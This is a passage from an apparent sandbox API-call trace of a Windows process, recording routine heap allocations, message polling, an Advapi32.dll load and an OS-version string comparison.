(HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0086.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0086.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0086.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0086.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0086.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0086.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0086.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0086.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0086.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0086.977] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0086.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0086.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0086.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0086.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77620 [0086.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0086.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0086.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0086.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0086.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0086.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0086.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0086.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0086.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0086.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0086.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0086.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0086.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0086.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0086.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0086.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0086.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0086.978] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0086.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0086.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0086.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0086.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0086.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0086.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0086.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0086.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77620 | out: hHeap=0x2af0000) returned 1 [0086.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0086.978] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0086.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0086.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0086.978] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0086.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77620 [0086.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0086.978] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0086.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77620 | out: hHeap=0x2af0000) returned 1 [0086.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0086.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0086.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72708 [0086.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0086.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0086.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0086.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0086.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9790 [0086.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77620 [0086.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0086.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0086.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0086.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0086.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0086.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0086.979] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0086.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0086.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0086.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0086.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0086.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0086.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0086.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0086.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0086.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0086.979] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0086.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0086.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0086.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0086.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0086.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0086.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0086.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0086.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0086.979] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0086.979] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0086.979] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0086.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0086.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0086.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0086.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0086.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0086.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0086.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0086.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0086.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0086.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0086.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0086.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0086.980] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0086.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0086.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0086.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0086.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0086.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77620 | out: hHeap=0x2af0000) returned 1 [0086.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0086.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0086.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0086.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0086.980] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0086.980] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0086.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0086.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0086.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0086.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77620 [0086.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0086.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0086.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0086.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0086.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0086.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0086.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0086.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0086.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0086.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0086.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77620 | out: hHeap=0x2af0000) returned 1 [0086.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0086.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0086.981] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0086.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0086.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0086.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0086.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77620 [0086.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0086.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0086.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0086.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0086.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0086.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0086.981] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0086.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0086.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0086.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0086.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0086.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0086.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0086.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0086.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0086.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0086.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77620 | out: hHeap=0x2af0000) returned 1 [0086.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0086.982] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0086.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0086.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0086.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0086.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0086.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0086.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0086.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a684c8 [0086.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0086.982] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0086.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0086.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0086.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a00 [0086.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0086.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0086.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9820 [0086.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0086.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0086.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0086.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0086.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0086.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a684c8 | out: hHeap=0x2af0000) returned 1 [0086.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0086.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0086.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0086.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0086.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0086.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0086.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0086.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0086.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0086.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0086.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0086.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0086.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0086.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0086.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0086.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0086.983] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0086.983] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0086.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77620 | out: hHeap=0x2af0000) returned 1 [0086.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0086.983] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0086.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0086.983] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0086.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77620 | out: hHeap=0x2af0000) returned 1 [0086.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0086.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0086.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0086.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0086.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0086.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0086.984] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0086.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0086.984] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0086.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0086.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0086.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0086.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0086.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0086.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0086.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0086.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0086.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0086.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0086.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0086.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0086.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0086.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0086.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0086.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0086.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0086.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0086.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0086.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0086.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0086.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 